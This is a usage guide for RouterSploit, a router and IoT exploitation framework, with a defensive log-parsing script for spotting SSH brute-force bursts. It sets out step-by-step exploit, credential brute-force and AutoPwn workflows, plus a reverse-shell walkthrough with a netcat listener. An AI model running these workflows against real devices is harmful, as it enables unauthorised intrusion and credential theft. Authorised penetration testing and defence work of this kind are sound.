# RouterSploit

## Overview

RouterSploit is an open-source exploitation framework for testing embedded devices, routers and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing and exploitation of network devices, similar to Metasploit but specialised for router and embedded-device penetration testing.
## Installation

### Ubuntu/Debian

```bash
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.py
```

### macOS (Homebrew)

```bash
brew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.py
```

### Docker

```bash
docker run -it threat9/routersploit
```

### From Source

```bash
git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.py
```

## Starting the Interactive Console

```bash
python3 rsf.py
# the RouterSploit prompt appears
```
## Basic Commands

| Command | Description |
|---|---|
| `help` | Display all available commands |
| `show modules` | List all available modules |
| `search [keyword]` | Search modules by name or description |
| `use [module]` | Load a specific module |
| `info` | Display module information and options |
| `set [option] [value]` | Configure module options |
| `back` | Exit the current module |
| `show options` | Display the current module's options |
| `exploit` or `run` | Execute the current module |
| `exit` | Exit RouterSploit |
## Module Types

### Exploits

Modules that exploit known vulnerabilities to gain unauthorized access or control:

```
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_upload
```

### Credential Testing

Modules for testing default credentials and brute-forcing logins:

```
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_creds
```

### Scanners

Modules that scan for vulnerabilities without exploiting them:

```
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scanner
```

### Payloads

Modules for generating and delivering payloads:

```
use payloads/reverse_shell
use payloads/bind_shell
```
## Searching and Listing Modules

### Search by Keyword

```
search d-link
search rce
search authentication
search remote_code_execution
```

### List All Modules

```
show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scanner
```

### Get Module Details

```
use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor info
```
## Working with Exploits

### Basic Exploit Workflow

```
# 1. Search for a relevant exploit
search netgear
# 2. Load the module
use exploits/netgear/cmd_injection
# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)
# 4. Set the required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444
# 5. Execute the exploit
exploit
# or
run
```

### Setting Target Information

```
set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1   # Remote host
```

### Setting Payload Options

```
set lhost 192.168.1.100   # Listener/attacker host
set lport 4444            # Listener port
set lpass password123     # Listener password
set payload reverse_shell
```

### Viewing Exploit Requirements

```
info
# Shows which options are required vs optional
show options
```
## Credential Testing

### Default Credential Testing

```
use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploit
```

### Brute-Force Attack

```
use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploit
```

### HTTP Credential Brute-Force

```
use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploit
```

### SSH Brute-Force

```
use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploit
```
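The credential modules above generate one signature that a router's own logs expose clearly: a burst of failed logins from a single source. The following is an added example, written for this page and not part of the RouterSploit project, showing how a defender would pick that burst out of dropbear-style SSH log lines (dropbear being the SSH daemon on many routers). The log lines are constructed for the example, and the threshold and window values are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample syslog lines in dropbear format; they are not taken
# from any real device. One source (192.168.1.100) hammers several
# accounts, another (10.0.0.7) fails twice, and one login succeeds.
SAMPLE_LOG = """\
Jan 14 10:02:01 gw dropbear[1203]: Bad password attempt for 'root' from 192.168.1.100:51234
Jan 14 10:02:01 gw dropbear[1204]: Bad password attempt for 'root' from 192.168.1.100:51235
Jan 14 10:02:02 gw dropbear[1205]: Bad password attempt for 'admin' from 192.168.1.100:51236
Jan 14 10:02:02 gw dropbear[1206]: Bad password attempt for 'admin' from 192.168.1.100:51237
Jan 14 10:02:03 gw dropbear[1207]: Bad password attempt for 'admin' from 10.0.0.7:40100
Jan 14 10:02:03 gw dropbear[1208]: Bad password attempt for 'root' from 192.168.1.100:51238
Jan 14 10:02:04 gw dropbear[1209]: Bad password attempt for 'user' from 192.168.1.100:51239
Jan 14 10:02:05 gw dropbear[1210]: Password auth succeeded for 'admin' from 192.168.1.50:40011
Jan 14 10:02:30 gw dropbear[1211]: Bad password attempt for 'admin' from 10.0.0.7:40101
"""

# Matches only failed password attempts; other dropbear messages are ignored.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dropbear\[\d+\]: "
    r"Bad password attempt for '(?P<user>[^']+)' from (?P<ip>[\d.]+):\d+$"
)


def parse_failures(text, year=2024):
    """Return a list of (timestamp, source_ip, username) per failed login.

    Syslog timestamps carry no year, so the caller supplies one (assumed
    2024 for the constructed sample).
    """
    events = []
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside a sliding window.

    Returns {ip: {"count", "first", "last", "users"}} describing the
    largest burst seen for each flagged source. The default threshold
    and window are assumptions, not values from any standard.
    """
    per_ip = defaultdict(deque)  # ip -> recent (timestamp, user) pairs
    alerts = {}
    for ts, ip, user in sorted(events):
        window = per_ip[ip]
        window.append((ts, user))
        # Drop attempts that have aged out of the window.
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            alerts[ip] = {
                "count": len(window),
                "first": window[0][0],
                "last": ts,
                "users": sorted({u for _, u in window}),
            }
    return alerts


if __name__ == "__main__":
    for ip, a in detect_bruteforce(parse_failures(SAMPLE_LOG)).items():
        print(f"{ip}: {a['count']} failed logins between {a['first']:%H:%M:%S} "
              f"and {a['last']:%H:%M:%S} for users {', '.join(a['users'])}")
```

Run against the sample, only 192.168.1.100 is flagged (six failures across three usernames in four seconds); the two spaced-out failures from 10.0.0.7 stay below the threshold. The same per-source counter is what a lockout or rate-limit on the device acts on, and it is the reason the "change default credentials" and "disable unnecessary services" points in the Security Considerations section matter: a management interface that is not reachable from the WAN never produces this burst in the first place.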
## Scanner Modules

### AutoPwn Scanner

Automatically scans for vulnerabilities and attempts exploitation:

```
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation paths
```

### Port Scanner

Identifies open ports on the target:

```
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploit
```

### Service Detection

Identifies services and their versions:

```
use scanners/service_scanner
set target 192.168.1.1
exploit
```

### Vulnerability Scanner

Scans for known vulnerabilities:

```
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploit
```
## Supported Vendors

RouterSploit includes modules for major router and embedded-device manufacturers:

| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
## Common Workflows

### Reconnaissance and Exploitation

```
# Step 1: Scan the target
use scanners/port_scanner
set target 192.168.1.1
exploit
# Step 2: Identify the device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit
# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploit
```

### Targeted Exploitation

```
# Know the target device? Search directly
search "TP-Link WR841N"
# Load the specific exploit
use exploits/tp-link/wr841n_rce
# Set options
set target 192.168.1.1
set lhost 192.168.1.100
# Execute
exploit
```

### Credential Harvesting

```
# Multiple credential-testing approaches
use creds/default_creds
set target 192.168.1.1
exploit
# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploit
```

### Post-Exploitation Shell Access

```
# After a successful exploit, obtain a shell
# Set up a listener (in a separate terminal)
nc -lvnp 4444
# In RouterSploit, execute the reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# Shell connects to the listener
```
## Custom Module Creation

### Module Structure

Create a custom exploit at `routersploit/modules/exploits/custom/`. The skeleton below uses the option and base classes that the framework's bundled modules use (`routersploit.core.exploit`, `HTTPClient`, `OptIP`, `OptPort`); the metadata values are placeholders:

```python
# routersploit/modules/exploits/custom/custom_router_rce.py
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    """Custom Router Exploitation Module"""

    __info__ = {
        "name": "Custom Router RCE",
        "description": "Custom exploitation module description",
        "authors": ("Your Name",),
        "references": ("https://example.invalid/advisory",),  # placeholder
        "devices": ("Custom Vendor Custom Model 1.0",),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        """Called by the console's 'run' / 'exploit' command."""
        if self.check():
            print_success("Target appears to be vulnerable")
            # Exploitation logic goes here
        else:
            print_error("Target is not vulnerable")

    def check(self):
        """Return True if vulnerable, False if not, None if undetermined."""
        response = self.http_request(method="GET", path="/")
        if response is None:
            return False  # no HTTP response at all
        # Vulnerability check logic goes here (e.g. fingerprint the response)
        return None
```
## RouterSploit vs Metasploit

| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
## Advanced Options

### Setting Threads for Brute-Force

```
use creds/http_bruteforce
set threads 10
# Increases concurrent attempts
```

### Custom Wordlists

```
set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txt
```

### Timeout Configuration

```
set timeout 10
# Increases the response wait time for slow networks
```

### Logging Output

```
exploit > output.log
# Capture results to a file
```
## Troubleshooting

| Issue | Solution |
|---|---|
| Module not found | Use `search` to find the correct module name |
| Connection refused | Verify the target IP and port accessibility |
| Exploit fails silently | Run `info` to verify all required options are set |
| Slow brute-force | Increase the `threads` parameter |
| Python import errors | Reinstall dependencies: `pip install -r requirements.txt` |
## Security Considerations

- Always obtain written permission before testing
- Use only on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup

## Resources

- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in the repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers